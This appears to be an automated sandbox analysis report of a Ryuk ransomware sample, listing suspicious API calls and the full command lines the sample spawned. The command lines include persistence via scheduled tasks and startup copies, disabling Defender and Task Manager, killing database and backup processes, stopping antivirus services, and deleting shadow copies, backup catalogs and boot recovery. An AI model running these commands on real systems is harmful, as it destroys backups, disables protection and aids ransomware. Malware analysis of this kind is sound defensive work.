N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 576 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 2044 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2044 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2044 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 576 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 948 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 948 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 948 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 576 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1520 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1520 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1520 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 576 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1324 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1324 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1324 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 576 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 916 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 916 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 576 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 680 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 680 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 680 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 576 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 588 wrote to memory of 524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 588 wrote to memory of 524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 588 wrote to memory of 524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 576 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 1296 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1296 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1296 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe C:\Windows\system32\cmd.exe
PID 384 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 384 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 384 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1416 wrote to memory of 1584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0xc8

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\RyukReadMe.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\system32\net.exe

net stop mfewc /y

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\RyukReadMe.txt

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef60f4f50,0x7fef60f4f60,0x7fef60f4f70

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1100 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1408 /prefetch:8

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1712 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\cmd.exe

